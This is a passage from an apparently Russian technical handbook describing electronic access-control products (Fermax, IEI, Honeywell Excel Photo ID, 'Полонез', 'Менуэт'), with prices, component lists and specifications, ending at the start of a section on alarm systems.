FSC03RU100 |
Считывание до 2000 жетонов и управление одной дверью в одном направлении |
399 |
FSP01RU |
Программное обеспечение (редактирование жетонов, изменение параметров, контроль помещений) |
|
FSW01 |
Кабель длиной 1 м для подключения к компьютеру |
20 |
FLEXI-SCANE |
||
FSE01RU100 |
Контроллер открывания одной двери в одном направлении с помощью жетонов и клавиатуры; возможность подключения датчиков охранной сигнализации; выход на принтер |
344 |
FSE02RU100 |
Контроллер открывания одной двери в одном направлении с помощью жетонов и клавиатуры; возможность подключения датчиков охранной сигнализации; выход на принтер Программирование с клавиатуры или с компьютера |
414 |
FSE03RU100 |
Контроллер открывания одной двери в одном направлении с помощью жетонов и клавиатуры; возможность подключения датчиков охранной сигнализации; выход на принтер. Программирование с клавиатуры или с компьютера. Возможность подключения к компьютеру до 16 контроллеров (требуется модуль CV-02 RU-OM) |
515 |
CV-02RU-OM |
Преобразователь интерфейса RS232/RS485 |
90 |
FSE04RU100 |
Считыватель до 2000 жетонов; управление с клавиатуры |
136 |
MULTI-SCAN IV |
||
MSC01RU100 |
Локальный контроллер для управления 4 дверьми |
400 |
MC02RU100 |
Сетевой контроллер (объединение до 16 контроллеров с возможностью управления 64 дверьми) |
400 |
MSD01RU100 |
Терминал с возможностью контроля прохода в обоих направлениях |
600 |
MSD02RU100 |
Терминал с возможностью контроля прохода в обоих направлениях; управление с клавиатуры |
676 |
MSS01RU100 |
Терминал с возможностью контроля прохода в обоих направлениях |
300 |
MSS02RU100 |
Терминал с возможностью контроля прохода в обоих направлениях; управление с клавиатуры |
376 |
MSI01RU100 |
Считыватель жетонов |
106 |
MSI02RU100 |
Считыватель жетонов; управление с клавиатуры |
182 |
Окончание таблицы 2. 4
Тип. системы |
Технические характеристики |
Цена, USD |
MSP01RU |
Программное обеспечение в комплекте с преобразователем интерфейса CV-02 RU-OM |
360 |
LINK-SCAN |
||
LSC01RU100 |
Сетевой контроллер (до 2000 жетонов) |
748 |
LSC02RU100 |
Сетевой контроллер (до 8000 жетонов) |
998 |
LST01RU100 |
Сетевой терминал |
606 |
TNC01RU100 |
Сетевой коммуникатор (без возможности редактирования жетонов) |
530 |
LSP20RU100 |
Программное обеспечение (до 2000 жетонов) |
1008 |
LSP80RU100 |
Программное обеспечение (до 8000 жетонов) |
1080 |
TSP20RU |
Программное обеспечение (с использованием сетевых коммуникаторов) |
1208 |
2. 2. 7. Системы ограничения доступа компании Fermax
Для систем ограничения доступа компания Fermax (Испания) производит оборудование двух типов: локальные системы и цифровые многозоновые системы.
В локальных системах ограничение доступа осуществляется с помощью считывающего устройства и ключа, по предъявлению которого и осуществляется непосредственный доступ. В качестве ключа могут быть использованы бесконтактная идентификационная карта, ключ-кнопка или цифровая клавиатура. Считыватели могут программироваться во время использования или заблаговременно. Они предназначены для открывания дверей, снабженных электронными замками. При отсутствии идентификации система формирует сигнал тревоги. Локальная система — это удобство и безопасность за сравнительно низкую цену.
Цифровые многозоновые системы включают в свой состав необходимое количество локальных систем и осуществляют их взаимодействие. Цифровые системы, кроме свойств локальных систем, обладают также такими возможностями, как определение неисправных зон, разграничение зон по времени, разрешение доступа и фиксирование времени, даты и кода доступа.
Локальная система на основе бесконтактных идентификационных карточек
Эта система предназначена для организации ограничения доступа в офисы, квартиры, гаражи и другие помещения. Она прочна, легка в установке, проста в использовании, что весьма немаловажно при ее монтаже в гимнастических залах, спортивных аренах, концертных залах и галереях, в частных клубах и в других местах, где необходимо осуществлять контроль доступа в помещение.
В состав локальной системы входят:
> бесконтактная идентификационная карточка;
> Считыватель;
> устройство для программирования;
> - источник питания;
> дверной электронный замок.
Бесконтактная идентификационная карточка по своим размерам напоминает кредитную, магнитную или таксофонную карточку (рис. 2. 17). Она не требует встроенного источника питания и проста в обслуживании.
Рис. 2. 17 Идентификационная бесконтактная карточка
Каждая карточка имеет уникальный код, предотвращающий возможность его копирования. Все карточки имеют узкую магнитную полоску для дополнительного применения. При необходимости карточка может находиться внутри бумажника — нет надобности вынимать ее, чтобы открыть дверь. Достаточно поднести бумажник к считывателю, который производит идентификацию карточки, на расстоянии до 8 см.
Считыватель состоит из считывающего устройства и контроллера, объединенных в одном корпусе (рис. 2. 18), и может устанавливаться как снаружи, так и внутри помещения.
Рис. 2. 18 Считыватель бесконтактных карточек
Корпус считывателя имеет ударопрочную конструкцию, предохраняющую устройство от постороннего вмешательства. Открывание двери сопровождается включением зеленого светодиода на передней панели считывателя и звуковым сигналом. Контроллер считывателя способен идентифицировать до 475 идентификационных карточек-ключей.
Устройство для программирования (программатор) карточек-ключей и контроллера считывателя (рис. 2. 19) не является обязательным для локальной
Рис. 2. 19 Программатор карточек-ключей и контроллера считывателя
системы ограничение доступа. Его рекомендуется использовать только для улучшения сервисных возможностей локальной системы.
Программатор используется только в том случае, когда необходимо запрограммировать новую идентификационную карточку-ключ или удалить из памяти контроллера считывателя код утерянной карточки.
Для питания системы используются два типа источников питания (рис. 2. 20). Основной источник питания (справа на рисунке) рассчитан на ток нагрузки до 1, 5 А и постоянное напряжение 12 В. Его корпус выполнен из огнеупорного ударопрочного материала. Резервный источник питания имеет те же самые характеристики, что и основной. Он предназначен для питания системы при отключении основного источника и в автономном режиме работы системы обеспечивает не менее 400 срабатываний замка.
Рис. 2. 20. Источники питания локальной системы
Локальные системы компании Fermax работают с различными открывающими устройствами, например с автоматическими гаражными воротами или турникетами.
Схема подключения локальной системы представлена на рис. 2. 21. Основные характеристики локальной системы:
> обслуживает до 175 пользователей;
> имеет дистанционное управление замками с помощью кнопки;
> осуществляет управление открыванием дверей;
Рис. 2. 21. Схема подключения локальной системы
> программируемое время разрешения доступа;
> исключает возможность копирования карточек;
> использует считыватель, пригодный для внутреннего и наружного приме нения, выполненный в ударопрочном и огнеупорном корпусе;
> позволяет считывать код карточки на расстоянии до 8 см.
Локальная система с использованием технологии компании Dallas
Система предназначена для организации ограничения доступа в офисы, на стоянки или в лифты. Система активизируется, в отличие от описанной выше, только при контакте кодового ключа со считывателем.
Для организации системы ограничения доступа с использованием контактного кодового ключа необходимы следующие устройства:
> электронный кодовый ключ;
> контактный считыватель;
> контроллер;
> программатор;
> источник питания.
Электронный кодовый ключ выполнен по технологии компании Dallas. В ударопрочном и влагозащищенном корпусе, оформленном в виде брелка (рис. 2.22), содержатся литиевая батарейка и микросхема памяти с уникальным идентификационным кодом, защищенным от копирования,
Рис.2.22.Электронный кодовый ключ
Контактный считыватель (рис. 2. 23) предназначен для считывания кода электронного кодового ключа. Он выполнен в виде платы, помещенной в высокопрочный металлический корпус.
Рис. 2.23 Контактный считыватель
Для открывания одной или нескольких дверей считыватели могут соединяться параллельно в единую систему. Управление системой может быть организовано по замкнутому циклу с помощью контроллера (рис. 2. 24). Коды ключей заносятся, хранятся в его памяти и используются для идентификации кодовых ключей пользователей. Система позволяет обслуживать до 680 кодовых ключей.
Рис. 2. 24 Контроллер для организации управления системой по замкнутому циклу
Программатор системы (рис. 2.25) выполнен в виде отдельного блока. Он предназначен для первоначального программирования и последующего обслуживания системы. Программирование контроллера может быть произведено вручную или с помощью персонального компьютера. Доступ к программатору осуществляется с помощью мастер-ключа, который входит в состав системы и не может быть подделан. Мастер-ключ выполняет функции, аналогичные мастер-картам.
Рис. 2.25 Программатор системы
Рис. 2.26. Схема подключения локальной системы
В данной локальной системе используются точно такие же источники питания, как и в рассмотренной выше.
Система может работать с различными запорными устройствами. Схема подключения локальной системы приведена на рис. 2. 26. Характеристики локальной системы, использующей технологию Dallas:
> обслуживает до 680 пользователей;
> проводное дистанционное управление дверьми с помощью кнопки;
> возможность параллельного подключения двух считывателей;
> осуществляет контроль за открыванием дверей с включением сигнала
тревоги;
> программируемые время разрешения доступа и длительность звучания
сирены;
> проста в налаживании и установке;
> возможность ручного и автоматического программирования;
> обеспечивает доступ к программатору с помощью мастер-ключа;
> не позволяет копирование кодовых ключей;
> имеет возможность внешней и внутренней установки считывателей.
Локальная система с использованием устройства набора кода
Эта система предназначена для использования в коттеджах, дачах и других помещениях, где необходимо ограничивать доступ. Доступ осуществляется путем ввода с клавиатуры цифрового кода, который может состоять из 4—6 цифр. Открывание и закрывание замка двери сопровождается звуковым и световым
cигналами. При необходимости для повышения степени надежности системы возможно использование вторичного кода, набираемого после основного. Система включает в себя электронное устройство набора цифрового кода (клавиатуру), контроллер, источник питания и электронный дверной замок.
Устройство набора цифрового кода (рис. 2. 27) выполняет функцию считывания кодов нажимаемых клавиш и ввода их в контроллер, обеспечивающий идентификацию кодов пользователей и разрешение или ограничение доступа в помещение. Устройство набора кода выполнено на плате, помещенной в ударопрочный корпус, на внешней стороне которого размещаются клавиши клавиатуры.
Рис. 2. 27 Устройство набора цифрового кода
Два устройства набора цифрового кода могут подключаться параллельно при установке одного снаружи, а другого внутри помещения, или на разных входах в помещение. Каждое устройство позволяет вводить два кодовых слова, состоящих из 4 — 6 цифр каждое, и имеет два выхода для управления исполнительными устройствами и передачи сигнала тревоги на контроллер.
Контроллер (рис. 2. 28) предназначен для управления всей системой, обработки вводимых с клавиатуры кодов и их идентификации.
Рис.2.28 Контроллер системы
Контроллер выполнен на отдельной плате, размещенной в металлическом корпусе, и устанавливается - внутри охраняемого помещения. Для питания локальной системы также используются два вида источников питания: основной и резервный, их характеристики были приведены выше. Схема подключения системы представлена на рис. 2. 29
Рис. 2. 29. Схема подключения локальной системы
Основные характеристики локальной системы, использующей устройства набора кода:
> использование встроенной микропроцессорной системы;
> использование двух независимых временных зон;
> отображение программируемого кода по инициативе пользователя;
> параллельное подключение нескольких устройств набора кода;
> простой монтаж и настройка;
> установка клавиатуры внутри и (или) снаружи помещения.
Цифровая многозоновая система ограничения доступа
Когда контроль доступа необходимо осуществить в разных по значимости помещениях или в различное время суток, локальной системы становится недостаточно и возникает необходимость в использовании многозоновой цифровой системы. Центральный пульт многозоновой системы может управлять одновременно 32 локальными системами, при этом для идентификации могут применяться любые известные устройства ввода (считывания), используемые в простых локальных системах, как это показано на рис. 2. 30.
Периферийные устройства, такие как считыватели, клавиатуры, замки и т. п., могут использоваться в различных комбинациях и конфигурациях.
Цифровой контроллер делает возможным запись происшествий и событий, в том числе и выборочно, с целью дальнейшей их обработки. Он может наблюдать за различными тревожными датчиками и в случае их срабатывания действовать в соответствии с заложенной программой. Контроллер позволяет идентифицировать до 10 групп пользователей и обрабатывать поступающую информацию для каждой из групп в установленном формате: правильность доступа, день недели, временная зона (т. е. время, в течение которого разрешен доступ). Каждая
Рис. 2. 30. Многозоновая цифровая система
группа имеет свое имя и код для доступа в соответствующее помещение. Система поддерживает до 1020 пользователей. Для выполнения системой своих функций центральный пульт управления должен содержать следующие блоки и модули: центральный блок и источник питания, выходной модуль, модуль памяти, управляющий модуль, модуль сигнала тревоги.
Центральный пульт предназначен для объединения всех модулей управления с помощью процессорного устройства (CPU). Кроме CPU, блок содержит
Рис. 2.31 Центральный пульт управления
интерфейсы считывателей, стабилизатор напряжения и источник резервного питания. Блок размещается в металлическом ударопрочном корпусе (рис. 2. 31) и устанавливается на стене.
Центральный пульт объединяет в себе все основные и сменные модули, необходимые для монтажа системы. Он управляет всеми этими модулями во время работы.
Выходной модуль предназначен для включения электронных дверных замков при поступлении на него сигнала разрешения доступа и номера двери. Модуль выполнен в виде отдельной платы (рис. 2. 32), на которой расположены 8 электронных реле и схема управления.
Рис. 2.32 Выходной модуль открывания дверей
Каждый выходной модуль позволяет управлять 8 дверными замками. В центральном блоке имеется возможность установки 4 таких модулей, что позволяет осуществлять доступ в 32 помещения.
Модуль памяти предназначен для записи, считывания и хранения служебной информации. Он выполнен на отдельной плате (рис. 2. 32), выпускаемой в зависимости от количества пользователей в двух модификациях: на 254 или на 1020 ячеек. В последних хранится информация следующего содержания: имя пользователя, номер группы и код доступа.
Рис. 2. 33 Модуль памяти
Источник питания предназначен для снабжения центрального пульта управления и периферийных устройств постоянным током до 4 А и напряжением+ 12 В, а также для преобразования входного переменного напряжения 80—270 В в напряжение+ 12 В и его стабилизации. Источник питания выполнен в ударопрочном огнеупорном корпусе (рис. 2. 34).
Рис. 2. 34 Источник питания
Рис. 2.35 Управляющий модуль
Програмирование системы удобно проводить с помощью клавиатурного считывателя с дисплеем. Если считыватели такого типа не используются в конфигурации системы или количество пользователей велико, а также для удобства программирования используется управляющий модуль, входящий в состав центрального пульта. Этот модуль позволяет выдавать на персональный компьютер обобщенную информацию, поступающую со считывателей: разрешение доступа, увеличение или уменьшение контролируемых входов, их модификацию и др.
При необходимости для регистрации происходящих событий в масштабе реального времени модулю может быть подключен принтер, а для передачи информации по каналам связи — модем.
Рис. 2.36 Модуль сигналов тревоги
Модуль сигналов тревоги предназначен для обработки тревожных сигналов, приходящих с датчиков различного типа. Он выполнен в виде отдельной платы со стандартным разъемом (рис. 2. 36).
Модуль сигнала тревоги обеспечивает функционирование системы, в которой используется центральный пульт с тремя зонами охраны (каждый центральный блок позволяет объединять до 4 модулей).
В цифровой многозоновой системе могут быть использованы считыватели различных типов, в том числе и те, что используются в локальных системах.
Считыватели идентификационных карточек (рис. 2. 37) позволяют использовать специальные идентификационные карточки с уникальным кодом, предотвращающим возможность его копирования.
Считывание идентификационного кода карточки осуществляется за время менее 1 с. Считыватель прост в использовании. Контактные считыватели, также как и в локальных системах, используют технологию компании Dallas (рис. 2. 38). Считывание кода происходит при касании считывателя кодовым ключом.
Рис. 2. 38 Контактный считыватель
Код, записанный в микросхеме памяти карточки, защищен от копирования. Устройство набора цифрового кода с дисплеем предназначено для считывания и отображения набираемых с помощью клавиатуры кодов и передачи их на центральный пульт, который обеспечивает разрешение доступа при вводе кодов, состоящих из 4—6 цифр и зарегистрированных в памяти контролера и системы (рис. 2.39).
Рис. 2.39 Устройство набора цифрового кода с дисплеем
На дисплее отображается текущее время и дата, которые фиксируются в памяти устройства при наборе кода и выводятся на принтер или компьютер вместе с кодом доступа.
Нажатие клавиш сопровождается тональным звуковым сигналом, а номер нажатой клавиши клавиатуры выводится на дисплей для контроля набора или коррекции кода. Устройство набора цифрового кода может быть использовано для программирования всей системы.
Электронное устройство набора кода, аналогичное используемым в локальных системах (рис. 2. 40), позволяет вводить код доступа нажатием от 4 до 6 цифр. Код может состоять из двух кодовых слов.
Рис. 2.40 Клавиатурный считыватель
Нажатие клавиш сопровождается звуковым тональным сигналом. В случае ввода неразрешенного кода выдается сигнал другой тональности. На рис. 2. 41 представлена схема использования цифровой многозоновой системы.
Соединение считывателей с центральным блоком осуществляется двухжильным проводом сечением не менее 0, 45 мм2, соединение центрального блока и дверных замков — двухжильным проводом сечением не менее 1 мм2.
Цифровая многозоновая система может быть использована совместно с видео- и аудиосистемами охраны, наблюдениями и ограничения доступа в любой конфигурации.
Рис. 2. 41. Схема использования цифровой многозоновой системы
2. 2. 8. Системы ограничения доступа фирмы International Electronics Inc.
Фирма International Electronics Inc. (IEI) производит системы охраны и ограничения доступа на основе последних достижений науки и техники. Основным элементом этих систем является HUB-контроллер. Существует несколько разновидностей систем ограничения доступа, различающихся по своему назначению.
Рис. 2.42. Состав оборудования автономной системы контролера доступа серии Door Card Self-Contained Access Control.
Рис. 2.43. Состав оборудования системы Command 8 Control Series
Устройства этой серии (рис. 2. 44) обладают всеми возможностями приведенных выше систем.
Однако, в отличии от них, функции управления этой системы сосредоточены в отдельном модуле, размещенном, как правило, вне досягаемости пользователей. Этот модуль и называют HUB-контроллером (рис. 2. 45).
Рис .2.44 Устройства ограничения доступа Secured S Series
Рис. 2/45 HUB- контроллер
Программирование системы осуществляется как непосредственно с клавиатуры HUB-контроллера, так и с персонального компьютера, обеспечивая, таким образом, возможность гибкого конфигурирования системы под конкретные условия использования. Существует также возможность дистанционного программирования контроллера при помощи модема.
Конфигурация системы, использующей HUB-контроллер, представлена на рис. 2. 46.
Рис. 2. 46. Конфигурация системы на основе HUB-контроллера
Особенности HUB-контроллера:
> вся управляющая электроника находится в отдельном блоке;
> обслуживает до 500 пользователей;
> работает с двумя считывателями;
> имеет часы реального времени;
> содержит буфер данных на 1000 событий;
> имеет И К выход для передачи информации на беспроводной принтер;
> имеет коммуникационный порт RS-232 (1200 бод) для связи с компьютером;
> реализует функцию «ввод кода под принуждением»;
> поддерживает 8 временных зон;
> может работать по расписанию для одной из 8 зон;
> поддерживает возможность работы в сети;
> имеет кнопку дистанционного управления замком;
> содержит программируемые по временному интервалу 4 выхода управления;
> предусмотрена возможность дистанционного управления с помощью модема.
Выходные реле блока управляют замком и включают звуковую или световую сигнализацию при взломе двери, при оставлении ее открытой и при попытке блокирования охраняемой зоны.
При монтаже расстояние от контроллера до считывателя или от контроллера до контроллера не должно превышать 30 м при двухпроводной линии, а при использовании экранированного кабеля — 150 м.
Основное реле контроллера коммутирует ток до 5 А, остальные — до 1 А при напряжении +24 В.
Фирма IEI производит весь спектр дополнительного оборудования для вышеперечисленных устройств (рис. 2. 47): программное обеспечение для Secured Series, инфракрасный принтер, блок питания в корпусе или без него, магнитные или бесконтактные карты, электронные ключи и многое другое.
Рис. 2. 47. Дополнительные устройства фирмы IEI
2.2.9. Система идентификационных карточек Excel Photo ID
Система Excel Photo ID фирмы Honeywell Inc. (США) использует идентификационные карточки с фотографическими изображениями, обеспечивает их изготовление, обработку и хранение в удобной для использования базе данных. Особенности системы:
> проста в использовании и обучении;
> поддержка усовершенствованных цифровых технологий сканирования и сжатия изображений;
> соответствие стандарту качества.
Система Excel Photo ID позволяет получить цветные идентификационные карточки с фотографиями (рис. 2. 48) и хранить изображения в графической базе данных. Она может производить поиск необходимых данных, обновлять информацию, заново печатать карточки, формировать отчеты и отслеживать изменения информации о персонале. Система проста в обслуживании. Даже начинающий пользователь компьютера уже через несколько минут работы может научиться самостоятельно изготавливать высококачественные идентификационные карточки. Изображения и подписи подвергаются сжатию с использованием улучшенных алгоритмов и хранятся вместе с информацией о владельце карточки.
Рис. 2. 48. Удостоверение с фотографией, изготовленное с помощью системы Excel Photo ID
Система создана по принципу открытых систем, она совместима с несколькими промышленными стандартами и имеет соответствующие интерфейсы, что обеспечивает более широкий выбор аппаратных средств и оправдывает вложенные в нее средства при постоянном развитии техники. Она совместима с большинством моделей плат обработки изображений и принтеров, а также поддерживает карточки любых форматов, обеспечивает связь по сети между компьютером главной рабочей станции обработки изображений и рабочими местами просмотра изображений.
База данных настраивается на конкретного потребителя. По желанию можно добавлять или удалять поля записей и изменять стандартное размещение информации на экране, что позволяет сделать базу данных по-настоящему индивидуальной. Благодаря использованию оболочки Windows, сбор и обновление информации о сотрудниках производится быстро и легко. Внешний вид идентификационных карточек и размер изображения можно изменить по желанию пользователя.
Система позволяет перемещать базу данных Excel Photo ID в другую компьютерную систему в стандартном формате ASCII, что дает возможность использовать эту информацию для всей организации или предприятия. Она имеет встроенную интерактивную подсказку (Help), что уменьшает расходы на обучение персонала.
Система позволяет контролировать возможность просмотра и изменения базы данных при помощи процедуры регистрации пользователя на каждом компьютере системы. Каждому пользователю присваивается идентификатор и пароль, благодаря которым он получает индивидуальные права доступа.
Система Excel Photo ID поддерживает сети промышленных стандартов:
локальную сеть Ethernet и сетевой протокол TCP/IP. Это наиболее распространенные сетевые стандарты, благодаря поддержке которых система Excel Photo ID может подключаться к существующим локальным и глобальным информационным сетям. Предусмотрена возможность пакетной печати.
Системы Excel Photo ID могут быть объединены через локальную или глобальную информационную сеть с системой ограничения доступа и охраны Honeywell, Excel Security Manager (XSM R515). Изображения, полученные в системе Excel Photo ID, могут просматриваться на рабочих местах операторов XSM.
Система предоставляет стандартные формы отчетов: список сотрудников, включая фотографии; статус изменения карточек; операции в системе; статус базы данных. Имеется возможность создавать свои собственные отчеты, используя информацию о владельцах карточек, изображения, информацию о действиях операторов и конфигурации системы.
Предусмотрено множество различных способов для легкого и быстрого поиска в базе данных конкретного владельца карточки. Поиск может производиться с использованием полей ключей, по имени и фамилии владельца карточки из списка или путем просмотра ряда уменьшенных изображений.
Система Excel Photo ID поддерживает практически неограниченное количество рабочих мест, принтеров, вариантов оформления карточек, размеров карточек, полей записей базы данных, отчетов. Она обеспечивает возможность использования устройств обработки изображений, обладающих наилучшим разрешением, за счет поддержки интерфейса управления средствами мультимедиа (MCI) системы Windows и интерфейса Twain.
Высококачественные изображения, как правило, при хранении занимают большой объем дискового пространства. За счет использования улучшенного метода сжатия изображения и формата FIF с регулируемым коэффициентом сжатия, система Excel Photo ID позволяет максимально использовать имеющееся пространство на диске. Сжатие может выполняться несколькими путями: по запросу, автоматически во время захвата изображения, в назначенное время, при отсутствии обращений в течение определенного времени.
Кроме тех достоинств, что перечислены выше, система Excel Photo ID позволяет использовать ее для изготовления таких документов, как:
> карточки сотрудников;
> удостоверения с фотографиями;
> удостоверения для бесплатного проезда в транспорте;
> студенческие билеты;
> водительские удостоверения;
> членские билеты;
> карточки медицинского страхования.
Систему также можно использовать для составления телефонных справочников, описей, для учета постоянных клиентов и т. д.
2.2.1. Автономная электронная система ограничения доступа «Полонез»
Система ограничения доступа «Полонез» основана на применении высоконадежных идентификационных карточек памяти типа Touch Memory, используемых в качестве карточек пользователей, а также в качестве мастер-карт программирования электронных замков. Применение технологии Touch Memory обеспечивает высокий уровень секретности (248 комбинаций кода), что делает практически невозможным подбор кода идентификатора, а неповторимость кода каждого идентификатора-ключа или карточки гарантируется производителем — фирмой Dallas Semiconductor (США).
Электронная карточка Touch Memory это:
> миниатюрное электронное устройство производства американской фирмы Dallas Semiconductor, содержащее микросхему памяти, размещенную в корпусе, надежно защищающем ее от воздействий внешней среды (рис. 2.8);
Рис. 2.8. Карточка Touch Memory.
> 48-разрядный уникальный код, записанный на кремниевый кристалл ла зерным методом и различные объемы постоянной и оперативной памяти;
> энергонезависимый таймер;
> персональный идентификатор, который используется для разграничения доступа через электронную проходную в помещения, а также к персональным компьютерам локальной вычислительной сети. Функциональные возможности системы «Полонез» следующие:
> поддержание дверей в запертом состоянии;
> автоматический контроль состояния дверей (звуковой сигнал, если дверь открыта);
> автоматическое отпирание замков владельцами зарегистрированных электронных карточек;
> дистанционное отпирание дверей с рабочих мест;
> переключение в режим свободного доступа в помещения в экстренных случаях;
> аварийное открывание дверей механическими ключами.
Зарегистрированными считаются идентификационные карточки или ключи, коды которых занесены в память блока электроники и дают право на проход в определенное помещение. В энергонезависимую память системы может быть занесено до 250 кодов карточек или ключей пользователей. В случае потери карточки нет необходимости менять замок. Код утерянной карточки навсегда удаляется из памяти системы.
Система подает звуковой сигнал при отпирании замка и напоминает пользователям о необходимости закрыть за собой дверь. Сигнал тревоги подается, если дверь была вскрыта несанкционированно. Выносная кнопка управления замком позволяет дистанционно отпирать дверь. Замок оснащен системой аварийного отпирания механическим ключом на случай перебоев в сети питания и может использоваться как надежный механический замок-защелка. Состав электронной системы ограничения доступа "Полонез" показан на рис. 2.9.
Система "Полонез" обеспечивает свободный доступ в помещения в часы приема посетителей. Предусмотрена возможность расширения системы путем использования программно-аппаратного комплекса "Полонез" для централизованного
Рис. 2.9 Состав системы «Полонез»: 1 — планка запорная косячная; 2 — электромеханический замок: 3 — блок электроники; 4 — кабель соединительный; 5 — шнур сетевой; 6 — кабель кнопки дистанционного управления; 7 — кнопка дистанционного управления замком
ведения списков пользователей системы, учета их персональных идентификаторов, назначения прав по доступу на компьютере с последующим переносом этих данных в память электроники системы.
Процесс занесения новых кодов карточек пользователей в память системы полностью автоматизирован. В системе, помимо пользовательских карточек, имеется специальная карточка, используемая для программирования функций системы и кодов пользователей, именуемая мастер-картой. Прикосновением этой мастер-карты и новой карточки к считывателю замка можно зарегистрировать эту карточку пользователя.
На случай, если пользователей очень много и система «Полонез» установлена в нескольких помещениях, предусмотрена возможность ведения списков на персональном компьютере. Для переноса списков пользователей из компьютера в память системы не требуется прокладывать к двери кабель или подключать к замку компьютер. Перенос списков пользователей с персонального компьютера в память системы осуществляется при помощи все той же карты Touch Memory.
2.2.2. Компьютеризованный комплекс управления доступом «Менуэт»
Комплекс "Менуэт" предназначен для управления доступом на объект в помещения с помощью электронных ключей (идентификационных карточек). Ограничение доступа осуществляется по коду электронной карты и по времени доступа с протоколизацией событий.
Функциональные возможности сетевого комплекса "Менуэт" следующие:
> поддержание дверей в запертом состоянии;
> контроль за состоянием дверей (звуковой сигнал, если дверь открыта);
> автоматическое отпирание замков владельцами зарегистрированных электронных карточек;
> разграничение доступа в помещения по времени;
> автоматизированное тестирование и ведение протокола функционирования системы;
> функционирование в режиме электронной проходной;
> автоматическое ведение и анализ журналов:
— проходов пользователей с указанием даты и времени прохода;
— попыток несанкционированных действий пользователей с указанием даты и времени нарушений;
— работы операторов и администраторов системы.
Автоматизированная система управления доступом в помещения «Менуэт» в качестве электронных ключей пользователей использует электронные идентификаторы Touch Memory.
В энергонезависимую память каждого блока электроники системы может быть занесено до 740 кодов карточек пользователей. Каждый код уникален!
Рис. 2.10. Идентификаторы Touch Memory
Карточка Touch Memory содержит 248 комбинаций кода, что делает практически невозможным его подбор. Карточка обладает высокой механической прочностью, стойкостью к электромагнитному воздействию и служит более 10 лет. Она обеспечивает мгновенное считывание информации путем легкого касания считывателя. Одна идентификационная карточка избавляет от необходимости ношения связки ключей, так как может открывать несколько дверей. Миниатюрные размеры устройства позволяют оформить персональные идентификаторы в виде брелоков и карточек (рис. 2. 10), похожих на кредитные или таксофонные. Код утерянной карточки навсегда удаляется из памяти системы. Замки оснащены системой аварийного отпирания механическим ключом.
Основные технические характеристики сетевого комплекса «Менуэт»:
Количество обслуживаемых дверей (с возможностью
расширения), шт. ....................................................................... 1 — 128
Количество пользователей на один электронный замок, чел ............ 1 —740
Общее число пользователей системы, чел. .................................... 1 —2500
Дальность передачи данных по сети замков, м.............................. 1 — 1200
Время отпирания замка, с.................................................................. 0, 3
Время разрешенного прохода
(с момента касания картой), с............................................. регулируемое
Потребляемая мощность одного дверного комплекта
в режиме ожидания, Вт..................................................................... 0, 8
Максимальная потребляемая мощность одного дверного
комплекта, Вт................................................................................... 2, 5
Напряжение питания:
переменного тока, В.................................................................... 220
постоянного тока, В.................................................................... 12
Рис. 2.11. Состав комплекса «Менуэт»:
1 — сетевая карта; 2 — накладка косячная; 3 — электромеханический замок с датчиком положения двери и двумя считывателями электронных карточек; 4 — кабель соединительный; 5 — кабель питания;
6 — кнопка дистанционного управления замком; 7 — кабель канала передачи данных; 8 — контроллер замка; 9 — плата адаптера; 10 — считыватель кода электронных карточек
Для функционирования комплекса необходим IBM-совместимый компьютер с процессором не ниже i80386 и тактовой частотой более 33 МГц, оперативной памятью не менее 4 Мбайт и свободным дисковым пространством не менее 5 Мбайт, оснащенный манипулятором «мышь», имеющий два свободных слота расширения шины ISA для установки сетевой карты и карты адаптера, а также монитор VGA с видеокартой. Состав комплекса «Менуэт» и размещение его элементов представлены на рис. 2. 11.
Комплекс "Менуэт" работает следующим образом. После установки комплекса производится регистрация пользователей на рабочем месте администратора безопасности, т.е. вводится фамилия пользователя, регистрируется его личный идентификатор и производится назначение полномочий по доступу в помещения.
Для каждого пользователя назначаются двери, проход в которые разрешен, и определяется регламент посещения помещений. Затем компьютер автоматически загружает сформированную матрицу доступа в энергонезависимую память контроллера каждого замка. С этого момента решение о допуске в помещение принимает контроллер замка.
Процесс распознавания идентификатора заключается в считывании его уникального номера, сравнении со списком идентификаторов, разрешенных к проходу, проверки расписания прохода и сравнении с текущим временем. Если
доступ в это помещение разрешен и пользователь пришел в разрешенное время, звучит специальный тональный звуковой сигнал и замок отпирается. В противном случае, контроллер подает звуковой сигнал «Проход запрещен».
Во всех случаях контроллер системы производит запись о происшедших событиях в энергонезависимую память (ведет собственный протокол событий). При этом производится запись даты, времени прохода и попытки несанкционированного прохода. Протоколируются случаи, когда дверь была оставлена незакрытой и команды, переданные с компьютера.
Администратор имеет возможность управления комплексом с компьютера. Он может отпирать замки, временно или постоянно; блокировать или разблокировать замки; подавать команды по изменению режима работы замков; выполнять тестирование системы и контроллеров замков.
Комплекс позволяет считывать протоколы событий контроллеров замков. При этом протокол копируется из контроллера замка на жесткий диск компьютера и содержимое памяти контроллера обнуляется. На основе анализа протоколов работы замков производится учет посещаемости, рабочего времени, выявляются лица, попытавшиеся зайти в помещения, допуск в которые для них запрещен.
Функционирование комплекса не требует выделения специализированного компьютера и круглосуточного обслуживания замков. Данные могут обрабатываться периодически. Выход из строя отдельных структурных элементов не приводит к нарушению работы всей системы в целом.
2. 3. Системы охраны и наблюдения
Если вы заинтересованы в надежной охране вашей личной собственности (имущества квартир, загородных домов, дач, гаражей и т. п.), собственности вашей фирмы или предприятия (офисов, магазинов, складов, производственных помещений), то незаменимыми помощниками в этом деле станут системы охраны, наблюдения и безопасности отечественного и зарубежного производства.
Существует множество современных систем сигнализации различного уровня сложности — от простых «кнопок» до сложных микропроцессорных устройств. Эти системы имеют, как правило, автономное питание. Они обеспечивают контроль охраняемой территории с помощью специальных датчиков-извещателей, четко фиксирующих любые нарушения охраняемой зоны и выдающих звуковое оповещение об этом. Многие системы имеют возможность дистанционной передачи сигнала тревоги на центральный пульт охраны и выполняют ряд других сервисных функций.
С целью более полного понимания излагаемого ниже материала рассмотрим основные определения и термины, используемые при описании принципов функционирования систем охраны и безопасности.
Системы охраны и безопасности в процессе работы могут находиться в различных режимах: в режиме охраны (полной или частичной), в режиме наблюдения (снята с охраны) и режиме входа/выхода (см. ниже).
В режиме полной охраны система осуществляет контроль за всеми подключенными зонами (датчиками) и обеспечивает наивысший уровень безопасности. В режиме частичной охраны возможно отключение некоторых зон, например детекторов движения, расположенных внутри помещения. В этом режиме нахождение в помещении людей и животных не влияет на работу системы, но в то же время позволяет контролировать взлом окон, дверей, стен, возникновение пожара и т. п.
